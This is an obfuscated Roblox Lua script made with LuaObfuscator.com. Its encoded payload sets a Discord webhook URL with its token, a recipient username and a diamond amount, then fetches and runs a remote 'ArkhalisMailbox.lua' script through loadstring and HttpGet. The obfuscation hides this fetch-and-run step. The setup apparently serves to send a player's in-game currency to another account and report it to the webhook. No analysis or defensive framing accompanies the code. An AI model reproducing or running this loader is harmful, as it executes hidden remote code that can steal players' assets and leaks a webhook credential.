--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v70,v19);v19=nil;v100=1;end end else return v70;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/(2^(v32-(2 -(1638 -(1523 + 114))))))%((5 -(3 + 0))^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v71-(v71%(620 -(555 + 64))) ;else local v72=931 -(857 + 74) ;local v73;while true do if (v72==((809 -241) -(367 + 201))) then v73=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=117 -(32 + 85) ;local v35;while true do if (v34==((2542 -1476) -(68 + 997))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + ((2349 -1078) -((414 -188) + 1044)) ;v34=(354 -(87 + 263)) -3 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (182 -(67 + 113)) ;return (v37 * (189 + 67)) + v36 ;end local function v23()local v38=0 -(0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==(953 -(802 + 150))) then return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + 69)) + v39 ;end if ((997 -(915 + 82))==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + (8 -(1192 -(1069 + 118))) );v18=v18 + 3 + 1 ;v38=1 -0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 -0 ,4 + 16 ) * ((3 -1)^(32 + 0))) + v43 ;local v47=v20(v44,21,822 -(368 + 423) );local v48=((v20(v44,100 -(167 -99) )==(19 -(10 + 8))) and  -((1 + 2) -2)) or 1 ;if (v47==(442 -(416 + 26))) then if (v46==0) then return v48 * (0 -0) ;else local v77=0 + 0 + 0 ;while true do if (v77==(0 -0)) then v47=439 -(145 + 293) ;v45=430 -(44 + 386) ;break;end end end elseif (v47==(3533 -(998 + (1373 -(261 + 624))))) then return ((v46==(0 + (0 -0))) and (v48 * ((1 + (0 -0))/(772 -(201 + 571))))) or (v48 * NaN) ;end return v8(v48,v47-((3020 -(814 + 45)) -(116 + 1022)) ) * (v45 + (v46/(((13 -5) -6)^(31 + 21)))) ;end local function v25(v49)local v50=(372 + 708) -(1020 + 60) ;local v51;local v52;while true do if (v50==(1426 -(630 + 793))) then return v6(v52);end if (v50==(6 -4)) then v52={};for v78=2 -1 , #v51 do v52[v78]=v2(v1(v3(v51,v78,v78)));end v50=3;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=3 -2 ;end if (v50==(1748 -(760 + 987))) then v51=v3(v16,v18,(v18 + v49) -(1914 -(1789 + (486 -362))) );v18=v18 + v49 ;v50=768 -(745 + 21) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=2) then else v58=nil;v59=nil;v53=2 + 1 ;end if (0~=v53) then else v54=0;v55=nil;v53=1 + 0 ;end if (v53~=3) then else v60=nil;v61=nil;v53=1 + 3 ;end if ((2 + 2)==v53) then while true do if (v54~=1) then else local v96=0 + 0 ;while true do if (v96==0) then v57=nil;v58=nil;v96=1;end if (v96==(530 -(406 + 123))) then v54=2;break;end end end if (v54==(1769 -(1749 + 20))) then local v97=0 + 0 ;while true do if (v97==0) then v55=1322 -(1249 + 73) ;v56=nil;v97=1 + 0 ;end if (v97~=(1146 -(466 + 679))) then else v54=1;break;end end end if (2==v54) then local v98=0 -0 ;local v99;while true do if (v98==(0 -0)) then v99=0;while true do if (0~=v99) then else local v110=1900 -(106 + 1794) ;while true do if (v110==1) then v99=1;break;end if (0==v110) then v59=nil;v60=nil;v110=1 + 0 ;end end end if (v99==(1 + 0)) then v54=8 -5 ;break;end end break;end end end if (v54==3) then v61=nil;while true do local v102=0;local v103;while true do if (v102==(0 -0)) then v103=114 -(4 + 110) ;while true do if (v103~=0) then else local v111=584 -(57 + 527) ;local v112;while true do if (v111==(1427 -(41 + 1386))) then v112=0;while true do if (v112==1) then v103=1;break;end if (0==v112) then local v184=103 -(17 + 86) ;while true do if (v184==(1 + 0)) then v112=1;break;end if (v184~=(0 -0)) then else if ((8 -5)==v55) then local v191=0;while true do if (v191==0) then local v195=0;while true do if (v195==(166 -(122 + 44))) then for v198=1,v23() do v57[v198-1 ]=v28();end return v59;end end end end end if (v55~=(2 -0)) then else local v192=0 -0 ;local v193;while true do if (v192~=0) then else v193=0 + 0 ;while true do if (v193==(0 + 0)) then local v196=0 -0 ;local v197;while true do if (v196~=(65 -(30 + 35))) then else v197=0;while true do if ((1 + 0)==v197) then v193=1258 -(1043 + 214) ;break;end if (v197==(0 -0)) then for v205=1,v60 do local v206=0;local v207;local v208;local v209;while true do if ((1213 -(323 + 889))~=v206) then else v209=nil;while true do if ((0 -0)~=v207) then else local v216=0;while true do if (v216==(581 -(361 + 219))) then v207=1;break;end if (v216==(320 -(53 + 267))) then v208=v21();v209=nil;v216=1;end end end if (v207==(1 + 0)) then if (v208==1) then v209=v21()~=0 ;elseif (v208==2) then v209=v24();elseif (v208==(416 -(15 + 398))) then v209=v25();end v61[v205]=v209;break;end end break;end if (v206==0) then v207=982 -(18 + 964) ;v208=nil;v206=1;end end end v59[11 -8 ]=v21();v197=1;end end break;end end end if (v193==1) then for v200=1,v23() do local v201=0;local v202;local v203;while true do if (v201==0) then v202=0 + 0 ;v203=nil;v201=1 + 0 ;end if (v201==1) then while true do if ((850 -(20 + 830))~=v202) then else v203=v21();if (v20(v203,1,1)==0) then local v210=0;local v211;local v212;local v213;local v214;local v215;while true do if (v210~=(2 + 0)) then else v215=nil;while true do if ((128 -(116 + 10))~=v211) then else while true do if (3==v212) then if (v20(v214,3,1 + 2 )==1) then v215[4]=v61[v215[742 -(542 + 196) ]];end v56[v200]=v215;break;end if (v212~=1) then else local v221=0;while true do if (v221==(0 -0)) then v215={v22(),v22(),nil,nil};if (v213==(0 + 0)) then local v227=0;local v228;local v229;while true do if ((0 -0)==v227) then v228=0;v229=nil;v227=2 -1 ;end if (v227==(1552 -(1126 + 425))) then while true do if (v228~=0) then else v229=405 -(118 + 287) ;while true do if (v229==0) then v215[3]=v22();v215[4]=v22();break;end end break;end end break;end end elseif (v213==1) then v215[3]=v23();elseif (v213==(7 -5)) then v215[3]=v23() -((1123 -(118 + 1003))^(46 -30)) ;elseif (v213~=3) then else local v236=377 -(142 + 235) ;local v237;local v238;while true do if (v236==(0 -0)) then v237=0;v238=nil;v236=1 + 0 ;end if (v236~=1) then else while true do if (v237==(977 -(553 + 424))) then v238=0 -0 ;while true do if (v238==0) then v215[3 + 0 ]=v23() -((2 + 0)^(10 + 6)) ;v215[2 + 2 ]=v22();break;end end break;end end break;end end end v221=1;end if (v221~=1) then else v212=2 + 0 ;break;end end end if (v212~=(0 -0)) then else local v222=0 -0 ;while true do if (0~=v222) then else v213=v20(v203,2,3);v214=v20(v203,4,6);v222=2 -1 ;end if ((1 + 0)==v222) then v212=4 -3 ;break;end end end if (v212~=2) then else local v223=753 -(239 + 514) ;while true do if (v223~=(1 + 0)) then else v212=3;break;end if (v223~=(1329 -(797 + 532))) then else local v226=0 + 0 ;while true do if (v226~=0) then else if (v20(v214,1 + 0 ,2 -1 )==(1203 -(373 + 829))) then v215[2]=v61[v215[2]];end if (v20(v214,2,733 -(476 + 255) )==(1131 -(369 + 761))) then v215[3]=v61[v215[2 + 1 ]];end v226=1 -0 ;end if (v226==1) then v223=1;break;end end end end end end break;end if ((1 -0)==v211) then local v218=238 -(64 + 174) ;while true do if (v218~=0) then else v214=nil;v215=nil;v218=1 + 0 ;end if ((1 -0)==v218) then v211=2;break;end end end if (v211==0) then local v219=0;while true do if (v219~=(336 -(144 + 192))) then else v212=0;v213=nil;v219=217 -(42 + 174) ;end if (v219~=(1 + 0)) then else v211=1 + 0 ;break;end end end end break;end if (v210==0) then v211=0 + 0 ;v212=nil;v210=1;end if (v210==(1505 -(363 + 1141))) then v213=nil;v214=nil;v210=1582 -(1183 + 397) ;end end end break;end end break;end end end v55=8 -5 ;break;end end break;end end end v184=1;end end end end break;end end end if (v103~=(1 + 0)) then else if (v55~=(1 + 0)) then else local v122=0;local v123;while true do if (0==v122) then v123=1975 -(1913 + 62) ;while true do if (v123==0) then local v188=0;while true do if ((0 + 0)==v188) then v59={v56,v57,nil,v58};v60=v23();v188=1;end if (v188==1) then v123=1934 -(565 + 1368) ;break;end end end if (v123==1) then v61={};v55=2;break;end end break;end end end if (0==v55) then local v124=0;local v125;local v126;while true do if (1~=v124) then else while true do if (v125==(0 -0)) then v126=0;while true do if (v126==0) then local v194=0;while true do if (v194==1) then v126=1662 -(1477 + 184) ;break;end if (v194==(0 -0)) then v56={};v57={};v194=1;end end end if (v126==(1 + 0)) then v58={};v55=1;break;end end break;end end break;end if (v124==0) then v125=856 -(564 + 292) ;v126=nil;v124=1 -0 ;end end end break;end end break;end end end break;end end break;end if (v53==1) then v56=nil;v57=nil;v53=5 -3 ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v80=v66;local v81=v67;local v82=v68;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do local v95=0;while true do if (v95==0) then v92=v80[v84];v93=v92[1];v95=1;end if (v95==1) then if (v93<=5) then if (v93<=2) then if (v93<=0) then v90[v92[2]]=v64[v92[3]];elseif (v93==1) then v84=v92[3];else local v128=0;local v129;local v130;local v131;local v132;while true do if (v128==1) then v85=(v131 + v129) -1 ;v132=0;v128=2;end if (v128==0) then v129=v92[2];v130,v131=v83(v90[v129](v13(v90,v129 + 1 ,v92[3])));v128=1;end if (v128==2) then for v186=v129,v85 do local v187=0;while true do if (0==v187) then v132=v132 + 1 ;v90[v186]=v130[v132];break;end end end break;end end end elseif (v93<=3) then local v115=0;local v116;local v117;local v118;local v119;local v120;while true do if (v115==8) then v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v115=9;end if (v115==2) then v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v64[v92[3]];v84=v84 + 1 ;v115=3;end if (3==v115) then v92=v80[v84];v120=v92[2];v119=v90[v92[3]];v90[v120 + 1 ]=v119;v115=4;end if (v115==5) then v84=v84 + 1 ;v92=v80[v84];v120=v92[2];v117,v118=v83(v90[v120](v13(v90,v120 + 1 ,v92[3])));v115=6;end if (v115==4) then v90[v120]=v119[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v115=5;end if (v115==0) then v116=nil;v117,v118=nil;v119=nil;v120=nil;v115=1;end if (7==v115) then v92=v80[v84];v120=v92[2];v90[v120]=v90[v120](v13(v90,v120 + 1 ,v85));v84=v84 + 1 ;v115=8;end if (v115==9) then v84=v92[3];break;end if (1==v115) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v64[v92[3]];v115=2;end if (v115==6) then v85=(v118 + v120) -1 ;v116=0;for v181=v120,v85 do v116=v116 + 1 ;v90[v181]=v117[v116];end v84=v84 + 1 ;v115=7;end end elseif (v93>4) then v90[v92[2]]();else v90[v92[2]][v92[3]]=v92[4];end elseif (v93<=8) then if (v93<=6) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93==7) then local v136=v92[2];v90[v136]=v90[v136](v13(v90,v136 + 1 ,v85));else do return;end end elseif (v93<=9) then local v121=0;while true do if (v121==0) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v64[v92[3]];v121=1;end if (v121==2) then v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v121=3;end if (v121==1) then v84=v84 + 1 ;v92=v80[v84];v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v121=2;end if (v121==3) then v84=v92[3];break;end end elseif (v93>10) then local v138=v92[2];local v139=v90[v92[3]];v90[v138 + 1 ]=v139;v90[v138]=v139[v92[4]];else v90[v92[2]]=v92[3];end v84=v84 + 1 ;break;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313039343836353133383O372O302O36382F686F585042506D6345567937747332426948694E51684E567A7845644B7561396A514E623567484C4A4E46755663684D3554484266396B336563684B46734E712O705F37030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D6503093O00736176696B63656D6F03083O004469616D6F6E6473024O0080841E4100163O00120A3O00013O0026063O000D000100020004013O000D000100122O000100033O00300300010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026063O0001000100010004013O0001000100122O000100033O0030090001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00083O00017O00",v9(),...);end
